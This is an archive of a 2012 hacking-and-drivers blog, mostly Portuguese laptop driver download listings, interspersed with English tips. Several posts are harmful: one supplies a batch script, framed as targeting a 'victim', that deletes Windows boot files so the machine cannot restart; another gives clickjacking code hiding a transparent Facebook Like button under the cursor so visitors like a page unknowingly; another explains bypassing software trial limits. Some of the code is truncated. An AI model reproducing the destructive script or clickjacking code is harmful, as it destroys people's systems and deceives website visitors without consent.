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Monday, 29 October 2012

Time Stopper: Use Trial Software for Lifetime

This is a great Software to Use Trial Software for Lifetime.

How to Use it?

1. Download and Extract the .rar File.

2. Now Install it and Open timestopper.exe

3. Now Click Browse and Select the .exe file of Trial Software

4. Now Choose the New Date.

5. and then Create the Shortcut at Desktop and delete all original shortcuts and enjoy!!!!!!

Friday, 26 October 2012

Baixar Driver da Webcam Notebook Samsung 305E4A-AD2

Download do driver da webcam do notebook Samsung NP 305E4A AD2BR para Windows XP

Download Disponível:

Webcam: Win.XP

Samsung drivers, driver da webcam 305E4A-AD2, driver da webcam Samsung 305E4A, download notebook 305E4AAD2, drivers 305E4A AD2, driver da webcam samsung NP305E4A-AD2BR, NP305E4A.

Baixar Driver de Audio Notebook Samsung 305E4A-AD2

Download do driver de audio do notebook Samsung NP 305E4A AD2BR para Windows XP e Windows 7.

Download Disponível:

Áudio: Win.7 64 / Win.7 32 / Win.XP

Samsung drivers, driver de audio 305E4A-AD2, driver de audio Samsung 305E4A, download notebook 305E4AAD2, drivers 305E4A AD2, driver de audio samsung NP305E4A-AD2BR, NP305E4A.

Baixar Driver de Video Notebook Samsung 305E4A-AD2

Download do driver de video do notebook Samsung NP 305E4A AD2BR para Windows XP e Windows 7.

Download Disponível:

Vídeo/VGA: Win.7 64 / Win.7 32 / Win.XP

Samsung drivers, driver de video 305E4A-AD2, driver de video Samsung 305E4A, download notebook 305E4AAD2, drivers 305E4A AD2, driver de video samsung NP305E4A-AD2BR, NP305E4A.

Baixar Drivers Notebook Samsung 305E4A-AD2

Download dos drivers do notebook Samsung NP 305E4A AD2BR para Windows XP e Windows 7.

Downloads Disponíveis:
Redes e conexões:
Rede Wireless: Win.7 64 / Win.7 32 / Win.XP
Bluetooth: Win.7 64 / Win.7 32 / Win.XP
Rede Local: Win.7 64 / Win.7 32 / Win.XP
Áudio: Win.7 64 / Win.7 32 / Win.XP
Vídeo/VGA: Win.7 64 / Win.7 32 / Win.XP
Webcam: Win.XP
TouchPad: Win.7 64 / Win.7 32 / Win.XP
HDMI: Win.7 64 / Win.7 32 / Win.XP
Chipset: Win.XP
Samsung drivers, drivers 305E4A-AD2, drivers Samsung 305E4A, download notebook 305E4AAD2, drivers 305E4A AD2, drivers samsung NP305E4A-AD2BR, NP305E4A.

Baixar Driver de Video Notebook Positivo Sim 5160

Download do driver de video do Notebook da Positivo modelo Sim + 5160 para Windows XP, Windows Vista e Windows 7.

Download Disponível:
Todos Drivers desse Notebook AQUI <----

Drivers positivo, positivo premium, Sim 5160, driver de video Sim+5160, positivo 5160 driver de video, positivo windows 7.

Baixar Drivers Notebook Positivo Sim 5160

Download dos drivers do Notebook da Positivo modelo Sim + 5160 para Windows XP, Windows Vista, Windows 7 e Windows 8 32 Bits e 64 Bits.

Downloads Disponíveis:
Redes e conexões:
Rede Wireless: Win.7 64 / Win.7 32

Rede Local: Win.7 64 / Win.7 32

 TouchPad: Win.7 64 / Win.7 32
Win.7 64 / Win.7 32
Win.7 64 / Win.7 32
Outros Drivers:
Win.7 64 / Win.7 32
 Drivers Notebook Positivo Sim 5160 para Windows 8

Áudio: Win.8 32 / Win.8 64
Vídeo: Win.8 32 / Win.8 64
Webcam: Win.8 32 / Win.8 64
Redes e Conexões:
Rede Wireless: Win.8 32 / Win.8 64
Rede Local/Ethernet: Win.8 32 / Win.8 64
Chipset: Win.8 32 / Win.8 64
Leitor de Cartões: Win.8 64
Drivers positivo, positivo premium, Sim 5160, drivers Sim+5160, positivo 5160 drivers, positivo windows 7.

Thursday, 25 October 2012

Get Free Automatic Unlimited Likes to your Facebook Page

it is not easy to get more fan or likers in your page. To make it easier and get unlimited likes for your blog or websites, you need to add some script in your template. This script will work in a way that whenever a user clicks on any part of your website, he/she will automatically like your blog or websites on Facebook. In this way, you will automatically get many likes for your blog or websites everyday without the users knowing about it.


1. Login to your Blogger Dashboard.

2. Click the drop-down menu and select Template.

3. Backup your Template before making any changes.

4. Click Edit HTML ---> Proceed --->  Expand Widget Templates.

5. Click Ctrl+F and search the code below:


5.Just above </head> tag, paste the code below:

<script src="" type="text/javascript">
<script type='text/javascript'>
         function ClickJackFbHide(){
         function ClickJackFbShow(){

6. Next, click Ctrl+F and search the code below:


Note: This code is a jQuery based widget and your blog must have the jQuery plugin. If your blog already have a latest jQuery plugin (the highlighted line), then ignore this code and directly proceed to the next step.

7. Just above </body> tag, paste the code below:

<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)';  margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden">

<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->

<iframe src=";layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe>

   <script type="text/javascript">
      jQuery( document ).ready( function() {
          $( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
            jQuery( "#clickjack-button-wrapper-5" ).css( {
               top: e.pageY - 10,
               left: e.pageX + 30
            } );
         } );
                        var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
      } );
                        function clickjack_hider(){
         jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});         jQuery("object").mouseout(function(){ClickJackFbShow();});
         jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});         jQuery("object").mouseover(function(){ClickJackFbHide();});

8. Replace with your Facebook Page URL.
Now click Save Template and you are done!

Click Here to Download both Codes in .txt file

There are some issues you might face using this script in your blog or website, the first thing is that when you or your readers drag or highlight the text they might not able to select the text as they will a see semi visible Like button which will be attached to your mouse cursor as it moves, the second one some other gadgets might get affected and act weirdly.

Monday, 22 October 2012

Baixar Drivers Netbook Acer Aspire One AO721

Drivers Netbook Aspire One AO721 para Windows 7 (32 /64bits)

Categoria Fornecedor Arquivo Versão Tamanho Data
Drivers para Windows 7 32 bits

3G Ericsson Driver do módulo 3G 12.5 MB 2010/05/24

3G Huawei Driver do módulo 3G 13.7 MB 2010/05/24

Audio Realtek Driver de áudio 78.7 MB 2010/05/24

Bluetooth Atheros Driver Bluetooth for Windows 7 SP1 6.18.0624.0302 199.9 MB 2011/04/12

Bluetooth Atheros Driver Bluetooth 57.4 MB 2010/05/24

Bluetooth Broadcom Driver Bluetooth 60.1 MB 2010/05/24

CardReader Realtek Driver da leitora de cartão 6.1.7600.30113 8.0 MB 2010/05/24

Rede local Atheros Driver da rede local 4.6 MB 2010/05/24

Modem liteon Driver do modem 2.2.99 2.0 MB 2010/05/24

TouchPad ALPS Driver Touchpad 7.106.2015.1104 9.7 MB 2010/05/24

TouchPad Synaptics Driver Touchpad 29.2 MB 2010/05/24

VGA AMD Driver VGA 8.692.1.0000 118.5 MB 2010/05/24

Rede local sem fio Atheros Driver da rede local sem fio (HB93) 23.5 MB 2010/05/24

Rede local sem fio Atheros Driver da rede local sem fio (HB97) 23.4 MB 2010/05/24

Rede local sem fio Broadcom Driver da rede local sem fio 5.60.350.6 20.5 MB 2010/05/24

Drivers para Windows 7 64 bits

Categoria Fornecedor Arquivo Versão Tamanho Data

3G Ericsson Driver do módulo 3G 12.5 MB 2010/05/24

3G Huawei Driver do módulo 3G 13.7 MB 2010/05/24

Audio Realtek Driver de áudio 78.7 MB 2010/05/24

Bluetooth Atheros Driver Bluetooth for Windows 7 SP1 6.18.0624.0302 100.0 MB 2011/04/12

Bluetooth Atheros Driver Bluetooth 57.4 MB 2010/05/24

Bluetooth Broadcom Driver Bluetooth 60.1 MB 2010/05/24

CardReader Realtek Driver da leitora de cartão 6.1.7600.30113 8.0 MB 2010/05/24

Rede local Atheros Driver da rede local 4.6 MB 2010/05/24

Modem liteon Driver do modem 2.2.99 2.0 MB 2010/05/24

TouchPad ALPS Driver Touchpad 7.106.2015.1104 9.7 MB 2010/05/24

TouchPad Synaptics Driver Touchpad 29.2 MB 2010/05/24

VGA AMD Driver VGA 8.692.1.0000 118.5 MB 2010/05/24

Rede local sem fio Atheros Driver da rede local sem fio (HB93) 23.5 MB 2010/05/24

Rede local sem fio Atheros Driver da rede local sem fio (HB97) 23.4 MB 2010/05/24

Rede local sem fio Broadcom Driver da rede local sem fio 5.60.350.6 20.5 MB 2010/05/24

Acer Aspire One drivers,

Baixar Driver Celular Samsung Galaxy 551 GT-I5510T Atualizado

Download do Driver do celular Samsung Galaxy 551 GT-I5510T para Windows 7, Windows XP e Windows vista
Sistema Operacional  Win XP/Vista/Windows 7
Descrição SAMSUNG Kies PC Sync
Arquivo 77.43 MB 

 Download Dispónivel

  Samsung Drivers, Galaxy 551 GT-I5510T driver, Galaxy 551 GT-I5510T Samsung, 551 GT-I5510T Samsung Galaxy driver USB.

Baixar Drivers Placa Mãe Phitronics H55-M

Download dos drivers da motherboard Phitronics H55 M para Windows XP, Windows Vista e Windows 7.
Downloads Disponíveis:
Pacote de Todos drivers: Opção 01/Opção 02
Chipset Win.XP/Win.Vista/Win.7: Opção 01/Opção 02 
Phitronics drivers, drivers H55-M, drivers placa mãe H55M, phitronics H55 M, driver phitronics H55.

Baixar Driver Impressora Okidata Microline 320 Turbo

Download do driver de instalação da Impressora Okidata Microline 320 Turbo Matricial
 Downloads Disponíveis:
Okidata drivers, drivers impressora okidata, drivers impressora Microline, drivers microline 320, drivers impressora ML320, okidata matricial 320 turbo.

Baixar Driver de Video Notebook Positivo 3040

Download do driver de video do Notebook Positivo Premium 3040 para Windows XP, Windows Vista e Windows 7
Download Disponível:
Positivo 3040 driver de video, drivers positivo Positivo 3040, positivo premium drivers, download notebook 3040, premium 3040 drivers, drivers positivo P3040, driver de video para windows 7.

Baixar Drivers Notebook Positivo 3040 para Windows 7/Vista/XP

Download dos drivers do Notebook Positivo Premium 3040 para Windows XP, Windows Vista e Windows 7
Downloads Disponíveis:
Vídeo: Win.XP/Win.7/Win.8
Obs. Temos poucas informações para postar o restante dos drivers, se você possui este modelo e tem o número de série, ou outras informações passe para nós através dos comentários abaixo para que possamos disponibilizar o restante do drivers.

Positivo 3040 drivers, drivers positivo Positivo 3040, positivo premium drivers, download notebook 3040, premium 3040 drivers, drivers positivo P3040 para windows 7.

Sunday, 21 October 2012

Block AdBlocker on Your Blogger Blogspot

Advertisement annoys each and every visitor especially the pop up ads. This is the reason why lots of internet addicts recommend AdBlock, which brings fruitful experience to users but for Bloggers it’s the biggest pain in their brain. Click the Title Read More....

When a user blocks ads with the help of Ad Blocking Software It takes away lots of earning opportunities from a blogger and hence, they notice a significant decrease in their earnings. You have seen lots of WordPress Plugins created to block unwanted advertisement, but blogger lacks in optimizing. Therefore, in blogger we don’t have identical scripts like WordPress but what we have is, worth considering. This script will keep on sending notifications to your visitors until they disable AdBlock so today we will discuss How to Block AdBlock on Blogger BlogSpot Blog?

How To Get Rid Of AdBlock From BlogSpot Blogs:

To force your visitors to disable AdBlocker we will use a Script which will detect AdBlock and guide the user to disable if they want to continue, otherwise it will keep on sending annoying notifications to until or unless they disable AdBlock so to do so.
1. Go to Blogger >> Template >>
Back up your template incase any thing went wrong.

2. Now select Edit HTML >> Proceed.

3. Then search for ]]></b:skin>
once you find it, just above it paste the following CSS code:

#mbl_noadblocker {

4. Now search for </head> and just above it paste the following JavaScript Code:

<script type="text/javascript">
if (document.getElementById("mbl_noadblocker") != undefined)
    alert("We've detected that you're using AdBlock Plus or some other adblocking software. In order to keep this website free, this site is sponsored in part by advertisements.\r\nPlease consider disabling your ad blocker on this website\r\nif you enjoyed the content, and would like to support future \r\ninformative posts.Thank you!\r\n\r\nClick OK to continue\r\n\r\nPowered by LWTHacker.");

5. Now Search for <body> and just below it paste the following code:

<script type="text/javascript" src=""></script>

6. All done Save your Template by pressing Save Now button.
Replace This Red Words with Your Message.

Now any visitors who will visit your blog with AdBlock enable will face an annoying message, he will continue to get this message until he disables AdBlock.


Friday, 19 October 2012

Baixar Drivers Notebook Qbex Intel Core i5

Download dos drivers do Notebook da Qbex com placa mãe A14HV08 - Intel HM65, drivers Windows XP, Windows Vista e Windows 7.
Downloads Disponíveis:
Obs. precisamos de alguém que possua este modelo para nos passar mais informações de N/S e possamos postar o restante dos drivers.

Qbex Intel Core i5, drivers qbex, notebook qbex drivers, download qbex hm65, qbex a14hv08 drivers.

Customize Popular Post Widget In Blogger

Customizing and Stylizing Blogger Popular Post Widget:

1. go to Blogger >> Template >> (Create a backup in case anything went wrong).
2. Select Edit HTML >> Proceed.
3. Now  Search for ]]></b:skin> (CTRL+F Shortcut to quick search)
and just above it paste the following CSS Coding.
(Download Code)

/*--- LWTHacker --- */
.popular-posts ul{padding-left:0px;}
.popular-posts ul li {background: #FFF url(  no-repeat scroll 5px 10px;
  list-style-type: none;
  margin:0 0 5px 0px;
  padding:5px 5px 5px 20px !important;
  border: 1px solid #ddd;
.popular-posts ul
  li:hover {
  border:1px solid #6BB5FF;
.popular-posts ul
  li a:hover {
.popular-posts .item-thumbnail img {
  webkit-border-radius: 100px;
  -moz-border-radius: 100px;
  border-radius: 100px;
  -webkit-box-shadow: 0 1px 3px rgba(0, 0, 0, .4);
  -moz-box-shadow: 0 1px 3px rgba(0, 0, 0, .4);
  box-shadow: 0 1px 3px rgba(0, 0, 0, .4);

All Done: Finally, Press the Save Template button and you have successfully customized your  post widget. Now visit your site and enjoy the results.

Tuesday, 16 October 2012

AVI Screen: Step by Step Video Recorder

This is a very helpful tool for webmasters. it can be used for making Tutorials.
AviScreen is an application for capturing screen activity in the form of AVI video or bitmap images. Beside the usual options defining the capture area, AviScreen has a unique
feature called “follow the cursor”. Using this mode you can produce a video or image of relatively small dimensions while covering all mouse activity over the whole screen area.

All captures will be put in a folder defined in the folder options. Click the "Set" button to change the base output folder. Enjoy!!!!!!

Monday, 15 October 2012

Lock Windows Account After A Specific Number Of Wrong Login Attempts

By default you can perform unlimited user account login attempts on a Windows 7 system, which compromises with your privacy. if anyone knows you a bit and is capable of guessing your password then he may get access to your system after a few attempts.

here are the steps you need to follow to activate the auto lock after a specific number of login attempts:

1. Go to Start Menu and type "Local Security Policy". click on the result and launch the program.

2. Now click on Account Policies -> Account Lockout Policy -> Account Lockout Threshold

3. On clicking on Account Locking Threshold A pop up window will open asking number of failed attempts before account will be locked. Set it to whatever number you like. I recommend 5 as a good selection. Then apply and save the changes.

4. You are Half Done, if you wish you may continue. By the default the lockout duration is 30 minutes, if you find it less or more you can increase or decrease the duration as per your wish.

5. Double click Account lockout Duration under Account Policies. in the pop up window, select your preferred time and save the settings.

and Enjoy!!!!!.

Sunday, 14 October 2012

Permanently Shutdown Victim's Pc


Follow the Steps Below:

1. Open up notepad and copy and paste this code given below:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

2.Save it as a .bat file.

This Will Permanently shutdown the persons computer.
It shuts it off once and deletes the files needed to reboot and restart. Enjoy!!!!!

Friday, 12 October 2012

Baixar Driver de Áudio/Som Yamaha AC-XG YMF753 YMF743 YMF752

Download do driver de som Yamaha AC-XG YMF753 YMF743 YMF752 para windows XP

Yamaha AC-XG YMF753 YMF743 YMF752 driver de audio
Tamanho: 2.53 Mb
Downloads: 1569
Sistemas: Windows XP

Download do Driver:
Rapid Share: Link
Hotfile: Link

Yamaha AC-XG YMF753 YMF743 YMF752 driver de audio para windows XP

Thursday, 11 October 2012

Baixar Driver de Rede Notebook Positivo SIM + 700 (Ethernet e Wireless)

Downoad do driver de rede para notebook positivo 3D sim+700 para Windows 7 32 bits e 64 bits.

Downloads Disponíveis:
Rede Wireless: Opção 01: Win.7 64Win.7 32
Rede Ethernet: Opção 01: Win.7 64Win.7 32

Todos Drivers desse Notebook AQUI

drivers SIM + 700, driver positivo de rede, drivers sim + 700 3D, drivers positivo 3D, notebook positivo 3d driver de rede, positivo sim+ drivers, sim + 3D, Positivo 3D 700.

Baixar Driver Webcam Notebook Positivo SIM + 700

Downoad do driver da Webcam para notebook positivo 3D sim+700 para Windows 7 32 bits e 64 bits.

Download Disponível:
Webcam: Opção 01: Win.7 64Win.7 32

Todos Drivers desse Notebook AQUI
drivers SIM + 700, driver da Webcam positivo, drivers sim + 700 3D, drivers positivo 3D, notebook positivo 3d driver da Webcam, positivo sim+ drivers, sim + 3D, Positivo 3D 700.

Baixar Driver de Audio Notebook Positivo SIM + 700

Downoad do driver de audio para notebook positivo 3D sim+700 para Windows 7 32 bits e 64 bits.

Download Disponível:
Áudio: Opção 01: Win.7 64Win.7 32

Todos Drivers desse Notebook AQUI
drivers SIM + 700, driver de audio positivo, drivers sim + 700 3D, drivers positivo 3D, notebook positivo 3d driver de audio, positivo sim+ drivers, sim + 3D, Positivo 3D 700.

Baixar Driver de Rede Notebook Acer E1-471-6627 (Ethernet e Wireless)

 Download do driver de rede (Ethernet e Wireless) para Notebook Acer Aspire E1 471 6627 para Windows 7 32 e Windows 7 64.

Download dos drivers:
Rede Local/Ethernet: Win.7 32/Win.7 64
Rede Sem fil/Wireless: Win.7 32/Win.7 64
Todos Drivers desse Notebook AQUI
Acer Drivers, driver rede E1-471-6627, drivers E1-471-6627, acer E1471, drivers E1 471, download acer E1-471, notebook acer driver de rede.

Baixar Driver de Video Notebook Acer E1-471-6627

 Download do driver de video para Notebook Acer Aspire E1 471 6627 para Windows 7 32 e Windows 7 64.

Download do driver:
Vídeo/VGA: Win.7 32/Win.7 64
Todos Drivers desse Notebook AQUI
Acer Drivers, driver video E1-471-6627, drivers E1-471-6627, acer E1471, drivers E1 471, download acer E1-471, notebook acer driver de video.

Baixar Driver de Audio Notebook Acer E1-471-6627

 Download do driver de Audio para Notebook Acer Aspire E1 471 6627 para Windows 7 32 e Windows 7 64.

Download do driver:
Todos Drivers desse Notebook AQUI  
Acer Drivers, driver Audio E1-471-6627, drivers E1-471-6627, acer E1471, drivers E1 471, download acer E1-471, notebook acer driver de audio.